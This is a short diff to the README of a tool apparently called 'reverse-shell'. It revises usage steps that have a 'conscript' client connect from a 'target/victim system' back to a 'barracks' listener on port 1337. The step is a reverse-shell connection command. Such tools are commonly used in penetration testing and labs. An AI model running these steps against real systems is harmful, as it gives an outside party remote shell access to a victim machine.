justin-p/reverse-shell/README.md

 barracks 1337
 ```

-Now connect from the target/victim system, specifying the hostname/ip of the barracks, and port that the barracks is listening on (1337 in our example)
+Now connect from the target/victim system using the client (conscript), specifying the hostname/ip of the barracks, and port that the barracks is listening on (1337 in our example)
 ```bash
 conscript <ip/hostname of barracks> <port of barracks>
 ```